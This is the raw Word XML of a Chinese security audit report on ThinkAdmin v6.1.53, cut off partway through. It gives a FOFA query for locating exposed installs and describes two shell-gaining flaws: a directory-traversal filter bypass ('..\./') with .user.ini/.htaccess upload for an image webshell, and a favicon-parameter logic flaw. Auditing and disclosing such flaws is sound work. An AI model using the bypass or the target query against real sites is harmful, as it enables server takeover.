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7DF7" w14:textId="058BBD09" w:rsidR="00A52A27" w:rsidRDefault="00A06F5B" w:rsidP="00A06F5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hinkAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>审计报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D87D86" w14:textId="7527A879" w:rsidR="00066BB8" w:rsidRPr="00176E49" w:rsidRDefault="00A06F5B" w:rsidP="00066BB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6F5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>项目介绍</w:t>
      </w:r>
      <w:r w:rsidR="00605DC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00605DC1" w:rsidRPr="00F6385D">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ThinkAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 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是一款遵循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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00605DC1" w:rsidRPr="00F6385D">
          <w:rPr>
            <w:rStyle w:val="HTML"/>
            <w:rFonts w:ascii="var(--font-family-code)" w:hAnsi="var(--font-family-code)"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>MIT</w:t>
        </w:r>
      </w:hyperlink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 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协议开源的快速开发框架，基于最新版本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 </w:t>
      </w:r>
      <w:r w:rsidR="00605DC1" w:rsidRPr="00F6385D">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ThinkPHP6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 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的极简后台管理系统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 xml:space="preserve"> ( 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已兼容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 </w:t>
      </w:r>
      <w:r w:rsidR="00605DC1" w:rsidRPr="00F6385D">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ThinkPHP8</w:t>
      </w:r>
      <w:r w:rsidR="00605DC1" w:rsidRPr="00F6385D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> )</w:t>
      </w:r>
      <w:r w:rsidR="00CD60CD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD60CD" w:rsidRPr="00716D59">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://thinkadmin.top/"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00066BB8" w:rsidRPr="00530FFF">
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://thinkadmin.top/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DE982" w14:textId="77777777" w:rsidR="00176E49" w:rsidRPr="00066BB8" w:rsidRDefault="00176E49" w:rsidP="00114182">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F8ED0E" w14:textId="5FE5F721" w:rsidR="00066BB8" w:rsidRDefault="00066BB8" w:rsidP="00A06F5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审计版本：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00113491" w:rsidRPr="00113491">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ThinkAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00113491" w:rsidRPr="00113491">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Version v6.1.5</w:t>
      </w:r>
      <w:r w:rsidR="006F3118">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00902F30">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00902F30" w:rsidRPr="00902F30">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C28A39B" wp14:editId="545E815F">
            <wp:extent cx="5274310" cy="1948815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="882947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73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5DD6" w14:textId="77777777" w:rsidR="00093782" w:rsidRDefault="00093782" w:rsidP="00A06F5B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581A6711" w14:textId="71C9E974" w:rsidR="00902F30" w:rsidRPr="00F07E50" w:rsidRDefault="00A06F5B" w:rsidP="00F07E50">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars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fa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00DB6BB3" w:rsidRPr="00DB6BB3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>body="/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB6BB3" w:rsidRPr="00DB6BB3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>api.plugs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB6BB3" w:rsidRPr="00DB6BB3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/script"</w:t>
      </w:r>
      <w:r w:rsidRPr="00066BB8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003A72E1" w:rsidRPr="003A72E1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0DFE6D" wp14:editId="1CF898A2">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="726019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19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0EF4" w14:textId="77777777" w:rsidR="00C42D13" w:rsidRDefault="00A06F5B" w:rsidP="00A06F5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漏洞位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1C513" w14:textId="2DA28E8A" w:rsidR="00A06F5B" w:rsidRDefault="00C42D13" w:rsidP="00C42D13">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞一：目录穿越+文件上传=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001159B0" w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DD65A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞所在位置：</w:t>
      </w:r>
      <w:r w:rsidR="00DD65A8" w:rsidRPr="00DD65A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/app/admin/controller/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD65A8" w:rsidRPr="00DD65A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD65A8" w:rsidRPr="00DD65A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD65A8" w:rsidRPr="00DD65A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Upload.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00160E1C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>188-251</w:t>
      </w:r>
      <w:r w:rsidR="00160E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行 file函数</w:t>
      </w:r>
      <w:r w:rsidR="00160E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00160E1C" w:rsidRPr="00160E1C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A36AE4" wp14:editId="2A38E73F">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="552095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95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B8C" w14:textId="6D97230F" w:rsidR="00883BED" w:rsidRDefault="00883BED" w:rsidP="00883BED">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883BED">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A28F348" wp14:editId="5659295D">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1980316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16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BCE6" w14:textId="0314EAAB" w:rsidR="004D1045" w:rsidRDefault="004D1045" w:rsidP="004D104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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r w:rsidR="00E53B19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 限制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./</w:t>
      </w:r>
      <w:r w:rsidR="00930C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>无法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>存在 但是可以通过.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.\./</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r w:rsidR="002454EE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidR="002454EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行 对比key参数与文件的后缀是否一致</w:t>
      </w:r>
      <w:r w:rsidR="00E53B19">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008204E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>204</w:t>
      </w:r>
      <w:r w:rsidR="008204E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行 对比数据库中的允许上传的后缀</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F7BE57" w14:textId="023BA3FA" w:rsidR="006D387B" w:rsidRDefault="00DF4BBC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行 </w:t>
      </w:r>
      <w:r w:rsidR="006D387B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>可以看到强制限制的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D387B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D387B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>无法上传</w:t>
      </w:r>
      <w:r w:rsidR="00070E8B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00070E8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>其保存文件命名使用的是key参数非filename</w:t>
      </w:r>
      <w:r w:rsidR="00883BED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>综上所述</w:t>
      </w:r>
      <w:r w:rsidR="00883BED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00883BED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>可以利用目录穿越</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.ini</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>或者.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="000729E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>taccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00153B8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00153B8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>进行图片马的上传和使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB854E" w14:textId="77777777" w:rsidR="00274DF5" w:rsidRDefault="00274DF5" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CA0436" w14:textId="60B5783A" w:rsidR="00A30D32" w:rsidRDefault="00274DF5" w:rsidP="00A30D32">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞二</w:t>
      </w:r>
      <w:r w:rsidR="003120E2" w:rsidRPr="00C861FC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003120E2" w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">逻辑缺陷 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003120E2" w:rsidRPr="00C861FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A30D32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A30D32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞位置 </w:t>
      </w:r>
      <w:r w:rsidR="00A30D32" w:rsidRPr="00A30D32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/app/admin/controller/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A30D32" w:rsidRPr="00A30D32">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F4C7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80-111</w:t>
      </w:r>
      <w:r w:rsidR="001F4C7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行 system函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470724DA" w14:textId="3620256E" w:rsidR="00274DF5" w:rsidRDefault="001F4C7E" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4C7E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A48AB74" wp14:editId="52880560">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="832007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7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F7C" w14:textId="23DF47EB" w:rsidR="00294A90" w:rsidRDefault="00294A90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行 设置</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setFavicon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>传入参数</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_icon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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跟随进去到文件位置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBF143" w14:textId="77777777" w:rsidR="00294A90" w:rsidRDefault="00294A90" w:rsidP="006D387B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/vendor/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>zoujingli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/think-library/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/service/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SystemService.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15C877F4" w14:textId="3354BB22" w:rsidR="00294A90" w:rsidRDefault="00294A90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340 – 362</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">行 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Favicon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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br/>
      </w:r>
      <w:r w:rsidRPr="00294A90">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA84069" wp14:editId="4F7D2297">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="205428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89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ECD" w14:textId="77777777" w:rsidR="005E4C98" w:rsidRDefault="00A35567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44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行对传进来的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_icon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>参数进行正则判断是否含有htt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https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F3BD2" w14:textId="77777777" w:rsidR="001A557A" w:rsidRDefault="005E4C98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347</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
